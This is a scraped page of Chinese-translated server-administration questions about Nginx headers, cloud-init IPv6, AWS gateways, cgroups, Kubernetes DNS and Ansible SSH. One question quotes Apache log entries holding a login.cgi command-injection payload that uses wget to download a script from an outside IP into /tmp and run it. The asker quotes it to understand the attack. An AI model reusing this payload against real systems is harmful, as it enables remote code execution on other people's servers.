我有一个 Nginx 代理设置,我向服务器添加了几个与安全相关的标头,以便它们返回所有代理位置。在某些位置我需要添加额外的标头(例如Content-Security-Policyto /),而在其他特定位置我需要删除在服务器级别添加的标头之一(例如X-Frame-Optionsfrom /framepage.html)。
nginx.conf# ...
server {
# ...
include security-headers.conf;
location / {
proxy_pass http://web:5000/;
include security-headers.conf;
add_header Content-Security-Policy "my csp...";
}
location = /framepage.html {
proxy_pass http://web:5000/framepage.html;
# TODO: remove `X-Frame-Options` response header from this specific page
# Tried add_header X-Frame-Options "";
# Tried proxy_set_header X-Frame-Options "";
# Tried proxy_hide_header X-Frame-Options;
}
location /api/ {
proxy_pass http://api:5000/;
}
location /otherstuff/ {
proxy_pass http://otherstuff:5000/;
}
# ...
}
Run Code Online (Sandbox Code Playgroud)
security-headers.confadd_header …Run Code Online (Sandbox Code Playgroud) 我似乎无法在 Amazon EC2 的 Fedora 28 中使用 IPv6(因此使用 cloud-init 和 DHCPv6)。
它使用此处描述的配置在 RHEL 7 中工作。将相同的配置应用于 Fedora 28 似乎没有任何作用。特别是,/etc/sysconfig/network它不得到改写包含NETWORKING_IPV6=yes,也不/etc/sysconfig/network-scripts/ifcfg-eth0包含任何IPv6的东西。
我的/etc/cloud/cloud.cfg.d/56-custom-networking.cfg包含:
network:
version: 1
config:
- type: physical
name: eth0
subnets:
- type: dhcp
- type: dhcp6
Run Code Online (Sandbox Code Playgroud)
生成的/etc/sysconfig/network是:
NOZEROCONF=yes
DEVTIMEOUT=10
# Created by cloud-init on instance boot automatically, do not edit.
#
NETWORKING=yes
Run Code Online (Sandbox Code Playgroud)
生成的/etc/sysconfig/network-scripts/ifcfg-eth0是:
# Created by cloud-init on instance boot automatically, do not edit.
# …Run Code Online (Sandbox Code Playgroud) 我有一个 postfix 服务器,它有多个域,我想每个都有一个特定的证书。我的服务器只有一个IP。
我找到了一个多 IP 的解决方案,但没有我不知道如何做到这一点。
我\xe2\x80\x99m对AWS中的互联网网关感到困惑,如果它说为了让你的VPC访问互联网,你需要一个IGW,那么为什么当你使用EIP创建EC2实例时,你会自动访问互联网。
\n\n然后我有一个我无法回答的问题:
\n\n那么为什么当您在 AWS 中创建 EC2 实例(在默认 VPC 中创建)并分配弹性 IP 时,如果 AWS 文档中说为了让您的 VPC 能够访问互联网,您会自动访问互联网您需要互联网网关吗?
\n我正在构建一个新服务器Apache,实际上我正在学习,所以我正在尝试不同的东西。我的安全系统已经完成,但当然我可能会遗漏一些东西,或者,如果没有,我明白今天没有任何系统可以 100% 保护我。那么,为什么我认为有人尝试过我,只是因为我在日志中收到了以下信息:
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
还有更多。我知道有人收到错误 400,这对我来说还不错。所以,实际上我的问题不是他们是否尝试我,因为我认为是,因为这似乎不是对我网站的正常请求。我想得到这个请求的解释来理解和学习。他们实际上想做什么,找到我的登录系统并将其发送给某个人?
PS我已经知道wget你可以下载一些网站,我还发现这login.cgi是一个基于cookie的身份验证程序。
谢谢!
我正在尝试了解 cgroups v2 是如何工作的。我这样做了:
mount -t cgroup2 none /mnt/cgroup2
Run Code Online (Sandbox Code Playgroud)
这给了我一个对象列表 /mnt/cgroup2
root@ubuntu-s-1vcpu-1gb-lon1-01:~# ls -la /mnt/cgroup2/
total 4
dr-xr-xr-x 5 root root 0 Sep 2 16:04 .
drwxr-xr-x 3 root root 4096 Sep 2 16:05 ..
-r--r--r-- 1 root root 0 Sep 2 16:04 cgroup.controllers
-rw-r--r-- 1 root root 0 Sep 2 16:04 cgroup.max.depth
-rw-r--r-- 1 root root 0 Sep 2 16:04 cgroup.max.descendants
-rw-r--r-- 1 root root 0 Sep 2 16:04 cgroup.procs
-r--r--r-- 1 root root 0 Sep 2 16:04 cgroup.stat …Run Code Online (Sandbox Code Playgroud) 在Linux系统中,我们可以使用bellow命令开启报文转发:
~ # sysctl net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
Run Code Online (Sandbox Code Playgroud)
但是如何在 Windows 中实现相同的功能呢?
我用Windows Server 2008 R2.
我们有一个我们出售的 Web 解决方案,它带有 1 个专用的 Azure VM,其中包含运行应用程序所需的一切:
但是,特定客户要求在高可用性设置中运行其应用程序。他想要的是,当一台服务器出现故障时,另一台应该接管,反之亦然。
我对负载平衡/高可用性设置完全陌生,我知道 Azure 支持负载平衡,但我对如何使其工作感到困惑。使用上述设置创建 2 个服务器然后设置高可用性功能是否容易?我关心的是如何在两台服务器之间同步网站数据和 SQL Server 数据?尤其是后者。
或者如果我使用 Azure SQL 服务器而不是本地 SQL 服务器会更容易吗?或者可能引入额外的服务器而不是 2 个?
目前能够将所有服务解析为 IP 地址并进行 telnet 和 ping 操作。无法将 Pod 解析为 IP 地址。虽然可以使用 kubectl 和 telnet 查找 pod IP 地址并对它们执行 ping 操作。我需要如何配置 DNS 来解析 Kubernetes 1.9.6、dns-controller:1.9.1 中的 pod。
我正在使用 SSH 用户名和密码设置运行标准的 ansible (v2.3.1) 剧本。使用“-vvvv”设置时,我可以看到生成了这些 SSH 命令
EXEC ssh -C -o ControlMaster=auto -o ControlPersist=60s
-o StrictHostKeyChecking=no -o Port=2222
-o KbdInteractiveAuthentication=no
-o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey
-o PasswordAuthentication=no -o User=dc_user -o ConnectTimeout=10
Run Code Online (Sandbox Code Playgroud)
在上述情况下,从何处提取“PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey”设置。我相信这些来自客户端 SSH 配置设置,但这是正确的吗?
我知道我可以通过在我的“ansaible.cfg”中定义它来覆盖 ssh 参数
[ssh_connection]
scp_if_ssh=True
ssh_args = -o ControlMaster=auto -o ControlPersist=60s -o PreferredAuthentications=publickey
Run Code Online (Sandbox Code Playgroud)
谁可以给我解释一下这个?谢谢
amazon-ec2 ×1
amazon-vpc ×1
ansible ×1
apache-2.4 ×1
asp.net ×1
azure ×1
cgroup ×1
cloud-init ×1
dhcpv6 ×1
fedora ×1
hacking ×1
internal-dns ×1
ipv6 ×1
kubernetes ×1
linux ×1
login ×1
monitoring ×1
nginx ×1
postfix ×1
security ×1
sql-server ×1
ssh ×1
ssl ×1
windows ×1